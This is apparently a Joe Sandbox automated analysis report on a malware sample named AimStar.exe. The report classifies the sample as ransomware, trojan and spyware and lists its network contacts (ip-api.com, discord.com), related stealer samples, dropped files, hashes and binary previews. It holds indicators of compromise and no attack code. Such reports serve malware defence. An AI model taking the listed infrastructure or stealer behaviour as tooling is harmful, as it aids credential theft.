                                                                                                                                                                                              http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6AimStar.exe, 00000002.00000002.2408279953.000002020C488000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://login.microsoftonline.comAimStar.exe, 00000002.00000002.2415755951.000002020E07C000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2412961624.000002020D354000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2216216669.000002020D354000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2404357827.000002020D354000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://crl.thawte.com/ThawteTimestampingCA.crl0AimStar.exe, 00000000.00000003.2021718981.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://html.spec.whatwg.org/multipage/AimStar.exe, 00000002.00000002.2408722689.000002020C636000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://www.ifeng.com/AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://i.pinimg.com/736x/ec/43/75/ec4375c15336ba1e72b0062c515a1d92.jpgzAimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsAimStar.exe, 00000002.00000002.2411399871.000002020D0B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://www.zhihu.com/AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchAimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://www.rfc-editor.org/rfc/rfc8259#section-8.1AimStar.exe, 00000002.00000003.2056832978.000002020CA80000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2409740452.000002020CA73000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2056720050.000002020CD09000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://contoso.com/powershell.exe, 00000039.00000002.2230160700.000002A6B999E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    http://www.heaventools.comDVarFileInfo$AimStar.exefalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                    208.95.112.1
                                                                                                                                                                                                                    ip-api.comUnited States
                                                                                                                                                                                                                    53334TUT-ASUSfalse
                                                                                                                                                                                                                    162.159.128.233
                                                                                                                                                                                                                    discord.comUnited States
                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                    Analysis ID:1583098
                                                                                                                                                                                                                    Start date and time:2025-01-01 22:11:08 +01:00
                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                    Overall analysis duration:0h 11m 35s
                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                    Number of analysed new started processes analysed:108
                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                    Sample name:AimStar.exe
                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                    Classification:mal100.rans.troj.spyw.expl.evad.winEXE@172/63@4/2
                                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                                    • Successful, ratio: 60%
                                                                                                                                                                                                                    HCA Information:Failed
                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, WmiPrvSE.exe
                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 172.217.16.195, 172.202.163.200, 2.22.50.131, 2.22.50.144, 52.165.164.15, 20.242.39.171, 13.107.246.45
                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, gstatic.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7444 because it is empty
                                                                                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7552 because it is empty
                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                                    16:12:01API Interceptor8x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                                    16:12:03API Interceptor134x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                    16:12:16API Interceptor3x Sleep call for process: SIHClient.exe modified
                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    208.95.112.1L988Ph5sKX.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                    kj93GnZHBS.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                    ANuh30XoVu.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                    rivalsanticheat.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                    rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                                                                                                    • ip-api.com/json
                                                                                                                                                                                                                    vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                    • ip-api.com/xml
                                                                                                                                                                                                                    Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                    • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                    Extreme Injector v3.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                    VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                                                                                    • ip-api.com/json/?fields=61439
                                                                                                                                                                                                                    SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                                                                                                                                                                    • ip-api.com/json/
                                                                                                                                                                                                                    162.159.128.233file.exeGet hashmaliciousLummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRATBrowse
                                                                                                                                                                                                                    • discord.com/phpMyAdmin/
                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    ip-api.comL988Ph5sKX.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                    kj93GnZHBS.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                    ANuh30XoVu.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                    rivalsanticheat.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                    rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                    vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                    Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                    Extreme Injector v3.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                    VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                    SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                    discord.comrename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                                                                                                    • 162.159.137.232
                                                                                                                                                                                                                    Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                    • 162.159.138.232
                                                                                                                                                                                                                    Jx6bD8nM4qW9sL3v.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 162.159.128.233
                                                                                                                                                                                                                    dsoft.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                                                                                                                                                                                                    • 162.159.138.232
                                                                                                                                                                                                                    DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                                                                                    • 162.159.138.232
                                                                                                                                                                                                                    http://mee6.xyzGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 162.159.138.232
                                                                                                                                                                                                                    YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 162.159.136.232
                                                                                                                                                                                                                    YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 162.159.136.232
                                                                                                                                                                                                                    arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 162.159.137.232
                                                                                                                                                                                                                    webhook.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 162.159.138.232
                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    TUT-ASUSL988Ph5sKX.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                    kj93GnZHBS.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                    ANuh30XoVu.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                    rivalsanticheat.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                    rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                    vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                    Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                    Extreme Injector v3.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                    VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                    SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                                                                                                                                                                    • 208.95.112.1
                                                                                                                                                                                                                    CLOUDFLARENETUS7FEGBYFBHFBJH32.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    16oApcahEa.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                                                                                                                                    • 104.21.32.1
                                                                                                                                                                                                                    UhsjR3ZFTD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.32.1
                                                                                                                                                                                                                    544WP3NHaP.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                    • 172.67.220.198
                                                                                                                                                                                                                    KRNL.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                    01012025.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 172.67.198.102
                                                                                                                                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.112.1
                                                                                                                                                                                                                    test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 104.21.21.16
                                                                                                                                                                                                                    test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 104.21.21.16
                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI72842\VCRUNTIME140.dllDChOtFdp9T.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                                                                                                      user.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        HX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                                                                                                          YgJ5inWPQO.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                            wp-s2.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                                                              wp-s2.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                                                                wp-cent.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                                                                  wp-cent.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                                                                    WTvNL75dCr.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                                                                      WTvNL75dCr.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                                                                                                                                                        Process:C:\Windows\System32\SIHClient.exe
                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4761 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4761
                                                                                                                                                                                                                                        Entropy (8bit):7.945585251880973
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:6ZUpZsm0HwZ8FLSeXs+aiL9qcZ7KtlAD1GlNHgdkVI5F11AcNmwkVFzGz6ENhZC7:62T0QOLl8vAqcZ7K3AUNAdx5FAx9VEOj
                                                                                                                                                                                                                                        MD5:77B20B5CD41BC6BB475CCA3F91AE6E3C
                                                                                                                                                                                                                                        SHA1:9E98ACE72BD2AB931341427A856EF4CEA6FAF806
                                                                                                                                                                                                                                        SHA-256:5511A9B9F9144ED7BDE4CCB074733B7C564D918D2A8B10D391AFC6BE5B3B1509
                                                                                                                                                                                                                                        SHA-512:3537DA5E7F3ABA3DAFE6A86E9511ABA20B7A3D34F30AEA6CC11FEEF7768BD63C0C85679C49E99C3291BD1B552DED2C6973B6C2F7F6D731BCFACECAB218E72FD4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MSCF............,...................O..................YWP .disallowedcert.stl.lJ..B...CK.wTS.....{.&Uz.I."E".HS@. .P.!.....*E. .DQ..... EDA.H. E..""/.s<.s.9.....&#.{~k.VV..7@......b.R....MdT..B.L..%.C......" ....%.4%..%*.B..T.d...S.....pem..$....&.q.`.+...E..C.....$.|.A.!~d.H>w%S$...QC't..;..<..R@....2. .l..?..c..A....Ew...l..K$.. ~...'......Mt^c..s.Y%..}......h......m....h.......~d...,...=ge3.....2%..(...T..!].....!C~.X..MHU.o[.z].Y...&lXG;uW.:...2!..][\/.G..]6#.I...S..#F.X.k.j.....)Nc.].t^.-l.Y...4?.b...rY....A......7.D.H\.R...s.L,.6.*|.....VQ....<.*.......... [Z....].N0LU.X........6..C\....F.....KbZ..^=.@.B..MyH...%.2.>...]..E.....sZ.f..3z.].Y.t.d$.....P...,. .~..mNZ[PL.<....d..+...l.-...b.^....6F..z.&.;D.._..c."...d..... k9....60?&..Y.v.dgu...{.....{..d=..$......@^..qA..*uJ..@W.V..eC..AV.e+21...N.{.]..]..f]..`Z.....]2.....x..f..K...t. ...e.V.U.$PV..@6W\_nsm.n.........A<.......d....@f..Z... >R..k.....8..Y....E>..2o7..........c..K7n....
                                                                                                                                                                                                                                        Process:C:\Windows\System32\SIHClient.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):340
                                                                                                                                                                                                                                        Entropy (8bit):3.1356292262615493
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kK6m5+7DYUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:ScLkPlE99SCQl2DUeXJlOA
                                                                                                                                                                                                                                        MD5:A9268A0E0A7977EEDF4FD55FD9705B6C
                                                                                                                                                                                                                                        SHA1:17591DDA5B9CF8B1236F47D3202395D0DACF4D3B
                                                                                                                                                                                                                                        SHA-256:572C81F5DD779D1E873D380037D789931B04FFE0492D1C5F884F52D79DCAABD5
                                                                                                                                                                                                                                        SHA-512:DA15B24B6C9776A45A9B0C1C2C90685E23D8A66635F58980246C4F6BC6F4500FA17C8C18ECA108309CE051360ACF4069D592E3B70E29DFA4E7DD4FB273FB33A9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:p...... ........".l.\..(....................................................... ........~..MG......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                                                        Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:@...e...........................................................
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):691532
                                                                                                                                                                                                                                        Entropy (8bit):7.929016665354888
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:ir96sM1yjLJWrJc8B3BQ+XU/GqLqMnkETry2spscMJ0OzHRaWLH1CC6jR:ir9NJjL4JcEBXUum/r1JR7RaWCnR
                                                                                                                                                                                                                                        MD5:571BC85ADDABE4F5AD284AD392D52F2A
                                                                                                                                                                                                                                        SHA1:3238A79E68A71DA0C324F86192F2E2F6441244F1
                                                                                                                                                                                                                                        SHA-256:40BC5F4B433253789543BD7A431FCF8A067738D1B58F8EBD5A2AAE3E5A9D567C
                                                                                                                                                                                                                                        SHA-512:3E4EE402D01324D489A63FD060CD46600F7948CDA1C46F040BEA3510B5DC5CDF45317BE577D7D8E1A7B5DD4FC6CD19C7C933FBEF5DE83EDE341FA3975D46C8D5
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..y.mU........l...fk.....dd.}/3#".{.Qd...u]..QP....D.9.J!u..E..A. R.X.j.RJ.T...7....[c.U..9...6......D._.c.N.W...><..;=...Og...P..-..S.wXd.t??:.S.;..t/..G....{M..8.:i..OU..=.a..$........y1u|L.3O...{|..Y..HL.+..H..t.....;.....5.#.m...4........N....L..~:/.>...r.O&J.....TA.......o......G.E....2.....@....90..{[.>x..|..9.}........F..?..t..{~P..?1.0..T7....A..;....{.q......1So.+3....|..bK...LY..b..........6...c.7..2..;f.y.......[..o..Z...YL.....n.#1...s@.K...:..3...Ru....j.....).=S)?.o..R<.......C..7e.....6....W..Mg.sc5...2....<.t.rl.>7UK_.j.N...+}.7VS{.Puw....v].._....RLkA=..o.V...i\J,.1....;.\.s...9.].....1...%.]_-.=...zz....Lw.k...n....Ms.e\.[.k:w.k..W.qz..}v.:3..UUw...e...Jcg.+s....,.5}n..2.#.<.....t..bKvJ.......@...S|..Oh>..w2.._...3.0..U.....v..m..ose5..w.|....&.u....{.9,...ks.Y.e\.].m.m...Q.%[..-....J....T'...r+.O....z.M/..[\..:._.c....Y
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe
                                                                                                                                                                                                                                        File Type:RAR archive data, v5
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):725246
                                                                                                                                                                                                                                        Entropy (8bit):7.999732951070102
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:TTVC7xpbYpBSmhXVRPxb/zFFyRp5W1URFMbDtfZU63PnsbHm+EA73NwjogDJK7Qn:TTkx9iBS67PBFsDWOoZfq63vAHm+EA7i
                                                                                                                                                                                                                                        MD5:E9EB68A9E3C4230ADAF7E0CBC5B837A0
                                                                                                                                                                                                                                        SHA1:76B3DE65C9B184482A6E6171F4C794CFC9A25299
                                                                                                                                                                                                                                        SHA-256:831B64BCD5518C71DFB1137E309D366D02826B402975A92720DEEA5575225374
                                                                                                                                                                                                                                        SHA-512:9626F8C801B25691E4F710195D0B7339A3F41C498661044CCE7828FB42ED67A77AFC5BD9EA6B24A4968E9125502FE5D2B020C2EE7AFEF78BE867224FA0F2F991
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:Rar!....:t3=!.......o.WS...'........Z../4Y`..m..._..(JJ..`....K.t..m.G..)G._.Qq....N.........C...k3E.m..Ru........vh.X..i.{pf.]..:;...+.6...h.......=...U.........7...0T....e...l.'......_.{.)....2..5.K.D.wb..5g.u.T..Wa.}B..g.P..Rv....$."R4."1.j..zJy.n...$k.t. ..-.X.RA.>.`....h}:%s..,.....8-...++....+.......E,.1lc....A..5(.Y...T..M}j..K"#.OU.....!.2K..1..|b......:u.C.T".f.z i..9.(....!n....."...%..E.9.M......(.*.`.~.....4.qi5..T...&`>...C..R.4.J&..[.u3..*..Df.....L0.:...IJ^gH.7.\. Q.h..)xI......8..!...v.....{.s..1.sZ.Z.yk.[.*5.c....qX.........>..8.;`.?.F....;.].Z...Xt.......|..Uv.....&O..h.S'((w.A...6A...m....H.e...I..F......|.U....ur..&.>..(g.A$...P.H.h.TY@.....P@().b.i~..v.r...J{.....pc..Ul..0.'..|cY....H.X"w[..C5NH.G...3m...p..u.@t......Cr<h...(...;.5.6.B.^.......O...(.i..sad...B..F&T....Lp(#r2..'-.BB..Q.."........-+,K;...mD..X .{.v....&g...y....Um-.gU.$..O.r...|U...v~.A.#...I."..,V..b.,.^q._.U..c,o_..:-9. .$...'Fe.../.....s.J#.(Ux.C,u$.Kg..
                                                                                                                                                                                                                                        Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):894
                                                                                                                                                                                                                                        Entropy (8bit):3.1071032960175797
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:Q58KRBubdpkoPAGdjrlsfNdlYZk9+MlWlLehW51ICEsfNdl4I:QOaqdmOFdjrl8Ndlf+kWResLIN8NdlF
                                                                                                                                                                                                                                        MD5:4A2D56D86EE848243ED09B3CDC0F2A99
                                                                                                                                                                                                                                        SHA1:74E6CE35222A7AD9248B22F7F67BA84E4409CB7D
                                                                                                                                                                                                                                        SHA-256:6497B6E112E7354FA38B6842ED1C94714A70B82734F52D7B4D49B8C6FB7635C6
                                                                                                                                                                                                                                        SHA-512:0720B41A92E51CE8A483FDDA76D50F0B43FC3ABB93E8BAB7132B7C9F035B5938E6F0C0583B9B1F8327544ED539FFCB0C0FE9B27661882BCA71380E0C63EFF581
                                                                                                                                                                                                                                        Malicious:false
